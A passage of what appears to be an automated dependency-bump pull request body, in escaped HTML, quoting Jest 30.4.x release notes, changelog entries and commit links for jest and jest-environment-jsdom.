href=\"https://redirect.github.com/jestjs/jest/pull/16064\"\u003e#16064\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Use synchronous \u003ccode\u003eevaluate()\u003c/code\u003e for ES modules without top-level \u003ccode\u003eawait\u003c/code\u003e on Node versions that support it (v24.9+), and prefer the synchronous transform path when a sync transformer is configured (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16062\"\u003e#16062\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Support \u003ccode\u003erequire()\u003c/code\u003e of ES modules on Node v24.9+ (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16074\"\u003e#16074\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Validate TC39 import attributes (\u003ccode\u003ewith { type: 'json' }\u003c/code\u003e) on ESM imports (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16127\"\u003e#16127\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/transform]\u003c/code\u003e Add \u003ccode\u003ecanTransformSync(filename)\u003c/code\u003e on \u003ccode\u003eScriptTransformer\u003c/code\u003e so callers can pick the sync vs async transform path (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16062\"\u003e#16062\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-util]\u003c/code\u003e Add \u003ccode\u003eisError\u003c/code\u003e helper (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16076\"\u003e#16076\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[pretty-format]\u003c/code\u003e Support React 19 (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16123\"\u003e#16123\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[expect-utils]\u003c/code\u003e Fix \u003ccode\u003etoStrictEqual\u003c/code\u003e failing on \u003ccode\u003estructuredClone\u003c/code\u003e results due to cross-realm constructor mismatch (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15959\"\u003e#15959\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/expect-utils]\u003c/code\u003e Prevent \u003ccode\u003etoMatchObject\u003c/code\u003e/subset matching from throwing when encountering exotic iterables (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15952\"\u003e#15952\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[fake-timers]\u003c/code\u003e Convert \u003ccode\u003eDate\u003c/code\u003e to milliseconds before passing to \u003ccode\u003e@sinonjs/fake-timers\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16029\"\u003e#16029\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest]\u003c/code\u003e Export \u003ccode\u003eGlobalConfig\u003c/code\u003e and \u003ccode\u003eProjectConfig\u003c/code\u003e TypeScript types (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16132\"\u003e#16132\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-circus]\u003c/code\u003e Prevent crash when \u003ccode\u003easyncError\u003c/code\u003e is undefined for non-Error throws (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16003\"\u003e#16003\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-circus, jest-jasmine2]\u003c/code\u003e Include \u003ccode\u003eError.cause\u003c/code\u003e in JSON \u003ccode\u003efailureMessages\u003c/code\u003e output (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15967\"\u003e#15967\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config]\u003c/code\u003e Fix preset path resolution on Windows when the preset uses subpath \u003ccode\u003eexports\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15961\"\u003e#15961\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config]\u003c/code\u003e Allow \u003ccode\u003ecollectCoverage\u003c/code\u003e and \u003ccode\u003ecoverageProvider\u003c/code\u003e in project config without a validation warning (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16132\"\u003e#16132\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config]\u003c/code\u003e Project config validator now emits \u0026quot;is not supported in an individual project configuration\u0026quot; instead of \u0026quot;probably a typing mistake\u0026quot; for known global-only options (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16132\"\u003e#16132\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-environment-node]\u003c/code\u003e Fix \u003ccode\u003e--localstorage-file\u003c/code\u003e warning on Node 25+ (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16086\"\u003e#16086\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-reporters]\u003c/code\u003e Apply global coverage threshold to unmatched pattern files in addition to glob/path thresholds (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16137\"\u003e#16137\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jestjs/jest/commit/746f2a0f57c56e3bba555280f0587d40f3db95c0\"\u003e\u003ccode\u003e746f2a0\u003c/code\u003e\u003c/a\u003e v30.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jestjs/jest/commit/b3b4a09ed3005369dacc7466d1d2122797283785\"\u003e\u003ccode\u003eb3b4a09\u003c/code\u003e\u003c/a\u003e v30.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jestjs/jest/commit/5cbb21e0b3037edb42e503ec1a1ce80efad40c20\"\u003e\u003ccode\u003e5cbb21e\u003c/code\u003e\u003c/a\u003e v30.4.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jestjs/jest/commit/db7141a93cc85fab81cf9c25368e1f2b2c312286\"\u003e\u003ccode\u003edb7141a\u003c/code\u003e\u003c/a\u003e fix: allow \u003ccode\u003ecollectCoverage\u003c/code\u003e and \u003ccode\u003ecoverageProvider\u003c/code\u003e in project config (\u003ca href=\"https://github.com/jestjs/jest/tree/HEAD/packages/jest/issues/16132\"\u003e#16132\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jestjs/jest/commits/v30.4.2/packages/jest\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jest-environment-jsdom` from 30.3.0 to 30.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jestjs/jest/releases\"\u003ejest-environment-jsdom's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev30.4.1\u003c/h2\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-core, jest-runner, jest-schemas, jest-types]\u003c/code\u003e Allow custom runner configuration options via tuple format \u003ccode\u003e['runner-path', {options}]\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16141\"\u003e#16141\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Align CJS-from-ESM default export with Node: \u003ccode\u003emodule.exports\u003c/code\u003e is always the ESM default, \u003ccode\u003e__esModule\u003c/code\u003e unwrapping is no longer applied (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16143\"\u003e#16143\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jestjs/jest/compare/v30.4.0...v30.4.1\"\u003ehttps://github.com/jestjs/jest/compare/v30.4.0...v30.4.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev30.4.0\u003c/h2\u003e\n\u003cp\u003eBig release! 😀\u003c/p\u003e\n\u003cp\u003eMain feature is a rewrite of our custom runtime in preparation for stabilisation of native support of ESM. As part of that work \u003ccode\u003erequire(esm)\u003c/code\u003e module is now supported on Node 24.9+ (still requires \u003ccode\u003e--experimental-vm-modules\u003c/code\u003e like before).\u003c/p\u003e\n\u003cp\u003eIn addition we now support fake timers for the recently released \u003ccode\u003eTemporal\u003c/code\u003e API in Node v26.\u003c/p\u003e\n\u003cp\u003eReact 19 is also supported properly in \u003ccode\u003epretty-format\u003c/code\u003e, meaning snapshots of React components now work like they should.\u003c/p\u003e\n\u003cp\u003eDue to all the changes, there might be regressions that snuck in. Please report them!\u003c/p\u003e\n\u003cp\u003eFull list of changes below\u003c/p\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[babel-jest]\u003c/code\u003e Support collecting coverage from \u003ccode\u003e.mts\u003c/code\u003e, \u003ccode\u003e.cts\u003c/code\u003e (and other) files (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15994\"\u003e#15994\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-circus, jest-cli, jest-config, jest-core, jest-jasmine2, jest-types]\u003c/code\u003e Add \u003ccode\u003e--collect-tests\u003c/code\u003e flag to discover and list tests without executing them (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16006\"\u003e#16006\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-runner, jest-worker]\u003c/code\u003e Add \u003ccode\u003eworkerGracefulExitTimeout\u003c/code\u003e config option to control how long workers are given to exit before being force-killed (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15984\"\u003e#15984\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config]\u003c/code\u003e Add support for \u003ccode\u003ejest.config.mts\u003c/code\u003e as a valid configuration file (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16005\"\u003e#16005\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-core, jest-reporters, jest-runner]\u003c/code\u003e \u003ccode\u003everbose\u003c/code\u003e and \u003ccode\u003esilent\u003c/code\u003e can now be set per-project; the project-level value overrides the global value for that project's tests (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16133\"\u003e#16133\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Accept \u003ccode\u003eTemporal.Duration\u003c/code\u003e in \u003ccode\u003ejest.advanceTimersByTime()\u003c/code\u003e and \u003ccode\u003ejest.advanceTimersByTimeAsync()\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16128\"\u003e#16128\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Accept \u003ccode\u003eTemporal.Instant\u003c/code\u003e and \u003ccode\u003eTemporal.ZonedDateTime\u003c/code\u003e in \u003ccode\u003ejest.setSystemTime()\u003c/code\u003e and \u003ccode\u003euseFakeTimers({now})\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16128\"\u003e#16128\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Support faking \u003ccode\u003eTemporal.Now.*\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16131\"\u003e#16131\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-mock]\u003c/code\u003e Add \u003ccode\u003eclearMocksOnScope(scope)\u003c/code\u003e on \u003ccode\u003eModuleMocker\u003c/code\u003e for clearing every mock function exposed on a scope object (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16088\"\u003e#16088\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-resolve]\u003c/code\u003e Add \u003ccode\u003ecanResolveSync()\u003c/code\u003e on \u003ccode\u003eResolver\u003c/code\u003e so callers can detect when a user-configured resolver only exports an \u003ccode\u003easync\u003c/code\u003e hook (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16064\"\u003e#16064\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Use synchronous \u003ccode\u003eevaluate()\u003c/code\u003e for ES modules without top-level \u003ccode\u003eawait\u003c/code\u003e on Node versions that support it (v24.9+), and prefer the synchronous transform path when a sync transformer is configured (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16062\"\u003e#16062\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Support \u003ccode\u003erequire()\u003c/code\u003e of ES modules on Node v24.9+ (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16074\"\u003e#16074\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Validate TC39 import attributes (\u003ccode\u003ewith { type: 'json' }\u003c/code\u003e) on ESM imports (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16127\"\u003e#16127\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/transform]\u003c/code\u003e Add \u003ccode\u003ecanTransformSync(filename)\u003c/code\u003e on \u003ccode\u003eScriptTransformer\u003c/code\u003e so callers can pick the sync vs async transform path (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16062\"\u003e#16062\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-util]\u003c/code\u003e Add \u003ccode\u003eisError\u003c/code\u003e helper (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16076\"\u003e#16076\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[pretty-format]\u003c/code\u003e Support React 19 (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16123\"\u003e#16123\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[expect-utils]\u003c/code\u003e Fix \u003ccode\u003etoStrictEqual\u003c/code\u003e failing on \u003ccode\u003estructuredClone\u003c/code\u003e results due to cross-realm constructor mismatch (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15959\"\u003e#15959\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/expect-utils]\u003c/code\u003e Prevent \u003ccode\u003etoMatchObject\u003c/code\u003e/subset matching from throwing when encountering exotic iterables (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15952\"\u003e#15952\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[fake-timers]\u003c/code\u003e Convert \u003ccode\u003eDate\u003c/code\u003e to milliseconds before passing to \u003ccode\u003e@sinonjs/fake-timers\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16029\"\u003e#16029\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest]\u003c/code\u003e Export \u003ccode\u003eGlobalConfig\u003c/code\u003e and \u003ccode\u003eProjectConfig\u003c/code\u003e TypeScript types (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16132\"\u003e#16132\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jestjs/jest/blob/main/CHANGELOG.md\"\u003ejest-environment-jsdom's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e30.4.1\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-core, jest-runner, jest-schemas, jest-types]\u003c/code\u003e Allow custom runner configuration options via tuple format \u003ccode\u003e['runner-path', {options}]\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16141\"\u003e#16141\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Align CJS-from-ESM default export with Node: \u003ccode\u003emodule.exports\u003c/code\u003e is always the ESM default, \u003ccode\u003e__esModule\u003c/code\u003e unwrapping is no longer applied (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16143\"\u003e#16143\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e30.4.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[babel-jest]\u003c/code\u003e Support collecting coverage from \u003ccode\u003e.mts\u003c/code\u003e, \u003ccode\u003e.cts\u003c/code\u003e (and other) files (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15994\"\u003e#15994\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-circus, jest-cli, jest-config, jest-core, jest-jasmine2, jest-types]\u003c/code\u003e Add \u003ccode\u003e--collect-tests\u003c/code\u003e flag to discover and list tests without executing them (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16006\"\u003e#16006\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-runner, jest-worker]\u003c/code\u003e Add \u003ccode\u003eworkerGracefulExitTimeout\u003c/code\u003e config option to control how long workers are given to exit before being force-killed (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15984\"\u003e#15984\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config]\u003c/code\u003e Add support for \u003ccode\u003ejest.config.mts\u003c/code\u003e as a valid configuration file (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16005\"\u003e#16005\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-core, jest-reporters, jest-runner]\u003c/code\u003e \u003ccode\u003everbose\u003c/code\u003e and \u003ccode\u003esilent\u003c/code\u003e can now be set per-project; the project-level value overrides the global value for that project's tests (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16133\"\u003e#16133\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Accept \u003ccode\u003eTemporal.Duration\u003c/code\u003e in \u003ccode\u003ejest.advanceTimersByTime()\u003c/code\u003e and \u003ccode\u003ejest.advanceTimersByTimeAsync()\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16128\"\u003e#16128\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Accept \u003ccode\u003eTemporal.Instant\u003c/code\u003e and \u003ccode\u003eTemporal.ZonedDateTime\u003c/code\u003e in \u003ccode\u003ejest.setSystemTime()\u003c/code\u003e and \u003ccode\u003euseFakeTimers({now})\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16128\"\u003e#16128\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Support faking \u003ccode\u003eTemporal.Now.*\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16131\"\u003e#16131\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-mock]\u003c/code\u003e Add \u003ccode\u003eclearMocksOnScope(scope)\u003c/code\u003e on \u003ccode\u003eModuleMocker\u003c/code\u003e for clearing every mock function exposed on a scope object (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16088\"\u003e#16088\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-resolve]\u003c/code\u003e Add \u003ccode\u003ecanResolveSync()\u003c/code\u003e on \u003ccode\u003eResolver\u003c/code\u003e so callers can detect when a user-configured resolver only exports an \u003ccode\u003easync\u003c/code\u003e hook (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16064\"\u003e#16064\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Use synchronous \u003ccode\u003eevaluate()\u003c/code\u003e for ES modules without top-level \u003ccode\u003eawait\u003c/code\u003e on Node versions that support it (v24.9+), and prefer the synchronous transform path when a sync transformer is configured (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16062\"\u003e#16062\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Support \u003ccode\u003erequire()\u003c/code\u003e of ES modules on Node v24.9+ (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16074\"\u003e#16074\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Validate TC39 import attributes (\u003ccode\u003ewith { type: 'json' }\u003c/code\u003e) on ESM imports (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16127\"\u003e#16127\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/transform]\u003c/code\u003e Add \u003ccode\u003ecanTransformSync(filename)\u003c/code\u003e on \u003ccode\u003eScriptTransformer\u003c/code\u003e so callers can pick the sync vs async transform path (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16062\"\u003e#16062\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-util]\u003c/code\u003e Add \u003ccode\u003eisError\u003c/code\u003e helper (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16076\"\u003e#16076\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[pretty-format]\u003c/code\u003e Support React 19 (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16123\"\u003e#16123\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[expect-utils]\u003c/code\u003e Fix \u003ccode\u003etoStrictEqual\u003c/code\u003e failing on \u003ccode\u003estructuredClone\u003c/code\u003e results due to cross-realm constructor mismatch (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15959\"\u003e#15959\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/expect-utils]\u003c/code\u003e Prevent \u003ccode\u003etoMatchObject\u003c/code\u003e/subset matching from throwing when encountering exotic iterables (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15952\"\u003e#15952\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[fake-timers]\u003c/code\u003e Convert \u003ccode\u003eDate\u003c/code\u003e to milliseconds before passing to \u003ccode\u003e@sinonjs/fake-timers\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16029\"\u003e#16029\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest]\u003c/code\u003e Export \u003ccode\u003eGlobalConfig\u003c/code\u003e and \u003ccode\u003eProjectConfig\u003c/code\u003e TypeScript types (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16132\"\u003e#16132\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-circus]\u003c/code\u003e Prevent crash when \u003ccode\u003easyncError\u003c/code\u003e is undefined for non-Error throws (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16003\"\u003e#16003\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-circus, jest-jasmine2]\u003c/code\u003e Include \u003ccode\u003eError.cause\u003c/code\u003e in JSON \u003ccode\u003efailureMessages\u003c/code\u003e output (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15967\"\u003e#15967\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config]\u003c/code\u003e Fix preset path resolution on Windows when the preset uses subpath \u003ccode\u003eexports\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15961\"\u003e#15961\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config]\u003c/code\u003e Allow \u003ccode\u003ecollectCoverage\u003c/code\u003e and \u003ccode\u003ecoverageProvider\u003c/code\u003e in project config without a validation warning (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16132\"\u003e#16132\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config]\u003c/code\u003e Project config validator now emits \u0026quot;is not supported in an individual project configuration\u0026quot; instead of \u0026quot;probably a typing mistake\u0026quot; for known global-only options (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16132\"\u003e#16132\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-environment-node]\u003c/code\u003e Fix \u003ccode\u003e--localstorage-file\u003c/code\u003e warning on Node 25+ (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16086\"\u003e#16086\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-reporters]\u003c/code\u003e Apply global coverage threshold to unmatched pattern files in addition to glob/path thresholds (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16137\"\u003e#16137\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-reporters, jest-runner, jest-runtime, jest-transform]\u003c/code\u003e Fix coverage report not showing correct code coverage when using \u003ccode\u003eprojects\u003c/code\u003e config option (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16140\"\u003e#16140\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Resolve \u003ccode\u003eexpect\u003c/code\u003e and \u003ccode\u003e@jest/expect\u003c/code\u003e from the internal module registry so test-file imports share the same \u003ccode\u003eJestAssertionError\u003c/code\u003e as the global \u003ccode\u003eexpect\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16130\"\u003e#16130\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Improve CJS-from-ESM interop: \u003ccode\u003e__esModule\u003c/code\u003e/Babel default unwrap, broader named-export coverage, and shared CJS singleton across importers (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16050\"\u003e#16050\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Load \u003ccode\u003e.js\u003c/code\u003e files with ESM syntax but no \u003ccode\u003e\u0026quot;type\u0026quot;:\u0026quot;module\u0026quot;\u003c/code\u003e marker as native ESM (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16050\"\u003e#16050\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Extend the \u003ccode\u003e.js\u003c/code\u003e-with-ESM-syntax fallback to \u003ccode\u003erequire()\u003c/code\u003e on Node v24.9+ - falls back to \u003ccode\u003erequire(esm)\u003c/code\u003e when the CJS parser rejects ESM syntax (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16078\"\u003e#16078\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Fix deadlocks and double-evaluation in concurrent ESM and wasm imports (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16050\"\u003e#16050\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jestjs/jest/commit/b3b4a09ed3005369dacc7466d1d2122797283785\"\u003e\u003ccode\u003eb3b4a09\u003c/code\u003e\u003c/a\u003e v30.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jestjs/jest/commit/5cbb21e0b3037edb42e503ec1a1ce80efad40c20\"\u003e\u003ccode\u003e5cbb21e\u003c/code\u003e\u003c/a\u003e 